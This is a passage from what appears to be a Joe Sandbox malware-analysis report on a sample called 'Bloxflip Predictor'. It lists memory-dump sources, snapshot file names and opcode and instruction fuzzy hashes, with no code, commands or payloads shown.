                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 74257f7da1395c5cbd0e1268f3b57e0a28c53fbdc24f598eca46b0987ef2b904
                                            • Instruction ID: 464a63d5bc54cc661767ec50fdf314ab2bafcf9637f4baffc94b3ac72a9854ae
                                            • Opcode Fuzzy Hash: 74257f7da1395c5cbd0e1268f3b57e0a28c53fbdc24f598eca46b0987ef2b904
                                            • Instruction Fuzzy Hash: 68F14931B10304DFCB19DFB8E45A96D77B2EF88305B248969D906973A4DB399C92CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b53c41f0554de7dd83e402f29c2ff2909e32120dbf8f4d63507ce0248acc8521
                                            • Instruction ID: 0e7bc7d4f5b3e9223a96490e0824a2dbfd1cf9c216720979ac7ae3d954e98329
                                            • Opcode Fuzzy Hash: b53c41f0554de7dd83e402f29c2ff2909e32120dbf8f4d63507ce0248acc8521
                                            • Instruction Fuzzy Hash: C6D12931B10304DFCB19DFB8E45AA6D77B2EB89305B208969D506973A4DB399C92CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43e1bcec46363d156f47ca1437aa5bb61a9713126987edf7fe13d24d2ec75a84
                                            • Instruction ID: e6548e7606a4dec19d470c5a07f7381d65a1d2491c0a11392d8c04ac9145892a
                                            • Opcode Fuzzy Hash: 43e1bcec46363d156f47ca1437aa5bb61a9713126987edf7fe13d24d2ec75a84
                                            • Instruction Fuzzy Hash: D3E13630A10315CFDB18DF78E859AADB7B2FB98308F1045A9E5056B3A4DB799C91CF90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9833d66725512b29b48530df3681d59fda43fffb8abe9ea356cd43005cdf3ef7
                                            • Instruction ID: 368c6abcd8dc0c99642f2ccf5f83315debc7e23c0c104639c8e1775ccf8cd21e
                                            • Opcode Fuzzy Hash: 9833d66725512b29b48530df3681d59fda43fffb8abe9ea356cd43005cdf3ef7
                                            • Instruction Fuzzy Hash: FCE10734A00315CFDB24DF38E859BA977B2FB89304F1045A9D9099B3A4DB7A9D91CF90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e4f1a6ddb5763046139b067361a52add99eb4b065fb5a99ef4592be845ea7a7
                                            • Instruction ID: d5039a68ed772e85978b3973f3d1b8dd50789bf1944bc435325b41ba8549dfd7
                                            • Opcode Fuzzy Hash: 9e4f1a6ddb5763046139b067361a52add99eb4b065fb5a99ef4592be845ea7a7
                                            • Instruction Fuzzy Hash: D9C12931B10304DFCB19DFB8E46A96D77B2EF89305B208969C505973A4DB399C92CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c14d8d41f96579c21f0ac2cca97ccf765d8fa2a2d240913ae051af7d705d3599
                                            • Instruction ID: 5eed2dedac5276b83ac9893bcba9f657e7a70e108cf3fc17cd9afe044b0c9449
                                            • Opcode Fuzzy Hash: c14d8d41f96579c21f0ac2cca97ccf765d8fa2a2d240913ae051af7d705d3599
                                            • Instruction Fuzzy Hash: 2EC12A30710304DFDB19DFB8E46AA6D77B2EF89305B208A68C505973A4DB399C92CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 158223ada3223ef1059b51ab86770adf001048d3010efc287329c061dea9d4db
                                            • Instruction ID: 63261e17c6c8d43c58ac328e7b5658982fedc1bc75f9bf4422ae96a40b125950
                                            • Opcode Fuzzy Hash: 158223ada3223ef1059b51ab86770adf001048d3010efc287329c061dea9d4db
                                            • Instruction Fuzzy Hash: 67B11830710304CFDB19DFB8E56AA6D77B2EB89305B208A69C505973A4DB399C92CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55e510c7856d5b80af4938eef4f63d8ef204ce34b822180b339760499093e792
                                            • Instruction ID: 533ed3b844a4e3a03c1bc8a860097640f5ec6cc388f1ff6a4385f1c4fa94bc32
                                            • Opcode Fuzzy Hash: 55e510c7856d5b80af4938eef4f63d8ef204ce34b822180b339760499093e792
                                            • Instruction Fuzzy Hash: 0DA11930710304CFDB19DFB8E55AA6D77B2FB89305B208A69C505973A5DB3A9C92CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4130aed8f410e124bd9a3faddfc2cf4319bdf8b040a2cd05a1b36dd2a08ced07
                                            • Instruction ID: ea02157b2e5cdacc4e4e87be569048c154d21384921cac7cd37627a3c1107571
                                            • Opcode Fuzzy Hash: 4130aed8f410e124bd9a3faddfc2cf4319bdf8b040a2cd05a1b36dd2a08ced07
                                            • Instruction Fuzzy Hash: 5D91C131710240CFDB189B38E42867D7BA7EBA8748F208429D81697794CF799C55CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3f0475cdc67fd2c9f1901f9c7b3d6f0b0034f0afadd342d5c69fbdf3e01253e
                                            • Instruction ID: f0afc6b7ad12d92ffe857ad4b31b1ad120321e50df04bcf45125b3eeeab35d33
                                            • Opcode Fuzzy Hash: e3f0475cdc67fd2c9f1901f9c7b3d6f0b0034f0afadd342d5c69fbdf3e01253e
                                            • Instruction Fuzzy Hash: 22911F30B107008BD728DB7DE859BA837E2EB99354F148628D5169B7D0EFB8EC14CB81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89800c1b04d507ea60f6981311f8f8ce6c0a593463a71bff63cb25b7310dfc4d
                                            • Instruction ID: c5b6735e89646c88df88c01cee15d7554c07c3ad4a54efca4a86d0440f05cd84
                                            • Opcode Fuzzy Hash: 89800c1b04d507ea60f6981311f8f8ce6c0a593463a71bff63cb25b7310dfc4d
                                            • Instruction Fuzzy Hash: 2C717131310240CFEB19AB38E42977D77A7EBA8748B208469D80697794CF7D8C55CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 090618a680407530460ec0a5595f5edee29b3568f807c80833400fd42ca4a089
                                            • Instruction ID: cac60fb9d3fc954c2d7e19f75467ab0d2522020e6004a265c069efbb8ce4b279
                                            • Opcode Fuzzy Hash: 090618a680407530460ec0a5595f5edee29b3568f807c80833400fd42ca4a089
                                            • Instruction Fuzzy Hash: 2A7181313102408FEB19AB38E42977E37A7EBA8748F208469D80697794CF7D8C55CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9cde840bacec8265d1f04f7ca5e38cad2d674892ee496706246ca26f5cc20023
                                            • Instruction ID: 2425dafade8a9def16b099b9bde95e00312a9ee0c65a2c285b766c8531417950
                                            • Opcode Fuzzy Hash: 9cde840bacec8265d1f04f7ca5e38cad2d674892ee496706246ca26f5cc20023
                                            • Instruction Fuzzy Hash: E27181313102408FEB19AB38E42977E37A7EBA8748F208469D80697794CF7D8C55CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b76a8bb5816520bef04a5ff11eae7b54cd824930c7be0380a65384639acb2783
                                            • Instruction ID: 92f18d7ddef467b2c05ff4c090a41e4d93028101185cbf398b629b5cbca84bf0
                                            • Opcode Fuzzy Hash: b76a8bb5816520bef04a5ff11eae7b54cd824930c7be0380a65384639acb2783
                                            • Instruction Fuzzy Hash: 60818F3031A782CFC305DB38F46D59A7BB2FBA534870489A9D0408B269DB7C9C59CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bd4cd18ce156cdef1dc553700dc6def2cdef7a221156e54f09bfe3aba2bae11
                                            • Instruction ID: bf3abaa96f9844a4de2495db87230bbcc409c2e97ff31c50fe0dafdce330d104
                                            • Opcode Fuzzy Hash: 4bd4cd18ce156cdef1dc553700dc6def2cdef7a221156e54f09bfe3aba2bae11
                                            • Instruction Fuzzy Hash: 8D51E530B112019BEB18AB78D8197BE7697EBE4308F258439D5059BBD4CF79CC19C7A2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a2fffbfa0a8c4823c813be82f46885f282da6b65d7ef5ad69905a760279e208
                                            • Instruction ID: 86d3e6e25ee0a292576b4fd244af29ce0c836eb7d5a84a3c7f633aa10cbab8c5
                                            • Opcode Fuzzy Hash: 3a2fffbfa0a8c4823c813be82f46885f282da6b65d7ef5ad69905a760279e208
                                            • Instruction Fuzzy Hash: 81715930A00315CFDB24DB78E859BACB772FB54308F1045A9D9196B3A4DB7A5D91CFA0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ed09486e1a3fa271370d0d7fc230d45f515e835b585703d6c18858eef830df3
                                            • Instruction ID: e4ebd950c5c5e19ab0ebe3f72199743cc4d40c80939c3028cc58ca075ed6a6cd
                                            • Opcode Fuzzy Hash: 4ed09486e1a3fa271370d0d7fc230d45f515e835b585703d6c18858eef830df3
                                            • Instruction Fuzzy Hash: 3F512F31B10205CFDB18DFB8E4A9A6DB7B2EF88304F148929C515973A4DB789C52CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0269102d9949e6c6ca429f9d14b273c136507553f8b4f8261cedf313b274ebd4
                                            • Instruction ID: 7ca36013cba68755a1e49bb4db5930ea01c04c35412676306c5d2106cdc03c3f
                                            • Opcode Fuzzy Hash: 0269102d9949e6c6ca429f9d14b273c136507553f8b4f8261cedf313b274ebd4
                                            • Instruction Fuzzy Hash: 20411130A10780CFEB29CF3EE8497A97BE2EB85354F248268D5219B6D1DB799C51CB50
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b62fbfd5263f8af213b9038bcd331a14246e93f1e89c22fa7dbed9cabba8c65c
                                            • Instruction ID: 791b88908b50a918e4404adf5ccb2a81bb0e7906f29ae886280a929dbb8f422e
                                            • Opcode Fuzzy Hash: b62fbfd5263f8af213b9038bcd331a14246e93f1e89c22fa7dbed9cabba8c65c
                                            • Instruction Fuzzy Hash: CA411330B10780CFEB29DF3EE8193A837E2EB95354F188268D1219B6D0DBB99C51CB55
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0074953d975c4799fe847e4bd9ec83dd30d667d22000da9de839a20a0a74e28
                                            • Instruction ID: 980ec4a159a1be496df7e6bee3db5104447f5893af47782c0c1c6fc3a4439f64
                                            • Opcode Fuzzy Hash: e0074953d975c4799fe847e4bd9ec83dd30d667d22000da9de839a20a0a74e28
                                            • Instruction Fuzzy Hash: 0231E330B10205DFDB14CB78D859BAEBBF6AF89304F208079E505DB3A1DB719C088B91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75ba5c69298e3fea13eeab02fe2db9856bfb45e3432641a32bf3a2094f0ff590
                                            • Instruction ID: 42ccabfa65dd11efab9e6dca13033d74f07bd614a3cd7aed85434c36434ee9ec
                                            • Opcode Fuzzy Hash: 75ba5c69298e3fea13eeab02fe2db9856bfb45e3432641a32bf3a2094f0ff590
                                            • Instruction Fuzzy Hash: F7311B35B10205CFDB18DBB8E4A9A6DB7B2FB88304B148929C41597358DB389C92CBC1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 270d7cc396fcd06b32e958ced2905ead1f8eba282a4bd137672ce6531a9db42a
                                            • Instruction ID: 4af24d6801821d0cff632faa3c68d5f99f8a8de2a6db150c4bce8d72645e5a96
                                            • Opcode Fuzzy Hash: 270d7cc396fcd06b32e958ced2905ead1f8eba282a4bd137672ce6531a9db42a
                                            • Instruction Fuzzy Hash: C5210432B10519CBDB15EB78D8095ED7BE0EFD921871804A9D644EB211EF35DE06C7E1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23e93c06594e88acc2073c59f3ab976dfe383b73aa3e724bd3dc8fd0e34ef505
                                            • Instruction ID: 97d3c2ebd3033aad3fc676d2c81d8c2a34eea649a9679fa7234520a048e3d377
                                            • Opcode Fuzzy Hash: 23e93c06594e88acc2073c59f3ab976dfe383b73aa3e724bd3dc8fd0e34ef505
                                            • Instruction Fuzzy Hash: 33113D72F20205CAFB24E6BDD8421EE7BA6EBD8264F181036D715E3244DB31594186E2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02a10faaac420e73b92754aca15b1770563b9e4a8826ce3ea4c12b7302ecba37
                                            • Instruction ID: 93a3b81e359da329a2a910062cd4f5f90aa601e4a93fee856a72f8b05ce80737
                                            • Opcode Fuzzy Hash: 02a10faaac420e73b92754aca15b1770563b9e4a8826ce3ea4c12b7302ecba37
                                            • Instruction Fuzzy Hash: C321D475B003109FEB25EF78A8157BE3BA3EBD5714F20852AC11593790DB384C15CBA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507524103.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6040000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e3d19db459be177aef4702f7f0f0f482fc440c95d7087c53fa0ac88e1bbd3d0
                                            • Instruction ID: ae275e5f8aa15a7a78fbca4952be405eea27dfc8bdf6e16a1aa80bdefe27d013
                                            • Opcode Fuzzy Hash: 0e3d19db459be177aef4702f7f0f0f482fc440c95d7087c53fa0ac88e1bbd3d0
                                            • Instruction Fuzzy Hash: FA11BAB5909341AFD350CF19D840A5BFBE4FB98664F04895EF998D7311D231EA148FA2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504090512.0000000001150000.00000040.00000020.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_1150000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ed73daa93a7057efd2e389161459afe6f43382355fe05111cb51f5da2b1dca5
                                            • Instruction ID: d58ac5c00f3e11b15b4c4b99cbc7d38a40f6481ad5fb26936f0b9d0c6a3646f0
                                            • Opcode Fuzzy Hash: 1ed73daa93a7057efd2e389161459afe6f43382355fe05111cb51f5da2b1dca5
                                            • Instruction Fuzzy Hash: 8E214A311097C08FD7178B64C880B11BFA1AB4A314F2985DED4888B663D33A9906DB52
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504090512.0000000001150000.00000040.00000020.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_1150000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05dc690c1fa1cf8156dbc560bdd41111e2f924c3bce48ee8da1065cbc84accee
                                            • Instruction ID: 47991f0e9c1be0ea057044b410d35bc77e083d26f8bba595544389a6623b1d28
                                            • Opcode Fuzzy Hash: 05dc690c1fa1cf8156dbc560bdd41111e2f924c3bce48ee8da1065cbc84accee
                                            • Instruction Fuzzy Hash: 0311E131204280DFD759CB94DA40B26BBA1EB8D708F38C99CF8490BB42C73BD803DA52
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 747c013c3f7321e5116a71b00e7e6194d82730eb832743eb59f8cf91e03abf6d
                                            • Instruction ID: aa6dd5ea3e85fb5f65e8ed0a40eeb5abcd821456ba9179b06f99b1ba8d4572c9
                                            • Opcode Fuzzy Hash: 747c013c3f7321e5116a71b00e7e6194d82730eb832743eb59f8cf91e03abf6d
                                            • Instruction Fuzzy Hash: A811CA32B102058F8B18DFB8D8591AEB7F2EB9A2447214079C516E3390EB359E12CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 745b1f8c133047c6f25308fc20518551e704df225c0da00dd984a989aef3cff8
                                            • Instruction ID: 8c87b6b186a59e3fd908a1ae6969d1804d3d8a8b490b7240553b18e95000b0b1
                                            • Opcode Fuzzy Hash: 745b1f8c133047c6f25308fc20518551e704df225c0da00dd984a989aef3cff8
                                            • Instruction Fuzzy Hash: 9E11F171E10109EBDB04DFA9E885EDEFBB9EF88314F104126E505E7250EB355905CBA0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507524103.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6040000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf6e7c129b093c3d1bcb8f519d4ffc3b9bea224d1d32c773858f6d3af69d06b1
                                            • Instruction ID: 1e9ed74a3aea20b78ddcaddd46fda51ab78fb548911cd2021625361cd8bed57d
                                            • Opcode Fuzzy Hash: cf6e7c129b093c3d1bcb8f519d4ffc3b9bea224d1d32c773858f6d3af69d06b1
                                            • Instruction Fuzzy Hash: 1E110CB5909301AFD750CF09DC80E57FBE8EB88660F04881EF95897311E231E908CFA2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504334004.00000000011CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ca000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f02f66b17e6dd166fa891b8a0e80f25e6a0127b4bcfa307ff09d725bde8b2dd2
                                            • Instruction ID: 622dd6ea87302c90b336d5cdb3e6e486c731db4fa4e54fa5dc98cd18b5fd10a1
                                            • Opcode Fuzzy Hash: f02f66b17e6dd166fa891b8a0e80f25e6a0127b4bcfa307ff09d725bde8b2dd2
                                            • Instruction Fuzzy Hash: CF11FAB5909301AFD350CF09DC40E57FBE8EB98660F04891EF95897311D231E9088FA2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504090512.0000000001150000.00000040.00000020.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_1150000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d4a05d544e990f088ffcb23365075b19bfaa05c070b67f32ad9feec4ec040bd
                                            • Instruction ID: 62af9041b0376fbc88fd593c9e3d33d908ee3137a27f9a2950fdb8922bc96c1a
                                            • Opcode Fuzzy Hash: 5d4a05d544e990f088ffcb23365075b19bfaa05c070b67f32ad9feec4ec040bd
                                            • Instruction Fuzzy Hash: 590186B65097846FD7118B15AC40863FFE8EB8662070984AFED4987652D225A908CBB6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504090512.0000000001150000.00000040.00000020.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_1150000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c1c67aaa2b23e3d63c421edb1a30bdffb44cf47340dafd902acbb0d52c4d4a5
                                            • Instruction ID: 9d4fc7ce0ebb5b3b6d8a8f3bb55ceff6ea074e4b7e79a3fd150c4890d69d13f6
                                            • Opcode Fuzzy Hash: 8c1c67aaa2b23e3d63c421edb1a30bdffb44cf47340dafd902acbb0d52c4d4a5
                                            • Instruction Fuzzy Hash: AEF01D35108645DFC306CF44D540B16FBA2EB89718F24CAADE95917752C337E813DA81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504090512.0000000001150000.00000040.00000020.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_1150000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f54b252dc8bdecd14106e69373024902a4f38d1e398328d3cf8030fb34d2a55
                                            • Instruction ID: 9b4efd31b783d0fac5e68325d8ef771b004709087b696ccd0220ff2a4c11da48
                                            • Opcode Fuzzy Hash: 9f54b252dc8bdecd14106e69373024902a4f38d1e398328d3cf8030fb34d2a55
                                            • Instruction Fuzzy Hash: 80E092B66016444B9750CF0AEC41462F7D8EB84630708C47FDC0D8B701E239B509CEA5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507524103.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6040000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2000eb77e4286d7e66af1f6a9f13a6cdb8211584714b375cfbb7a433ba1c3d5b
                                            • Instruction ID: 7b976f7289ef2c09549a183455ffee249a2fc28e0ec3ae8468900dfeb09dc935
                                            • Opcode Fuzzy Hash: 2000eb77e4286d7e66af1f6a9f13a6cdb8211584714b375cfbb7a433ba1c3d5b
                                            • Instruction Fuzzy Hash: ECE0D8B254120467D2509E069C45F63FBE8DB54930F08C45BED0C1B702E172B5048DF5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507524103.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6040000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02199957644333b69f54a9672029df4148a89019f5dba1c9e751935e765cd965
                                            • Instruction ID: 79288dc6163c5a0e5348f01d72d0237afc3bfc5965fbf9d7f8c7b8006250d78f
                                            • Opcode Fuzzy Hash: 02199957644333b69f54a9672029df4148a89019f5dba1c9e751935e765cd965
                                            • Instruction Fuzzy Hash: 4DE0D8B254120467D2109E069C45F63FBD8DB54930F08C45BED081B701E172B614CDF5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507524103.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                            Joe Sandbox IDA Plugin
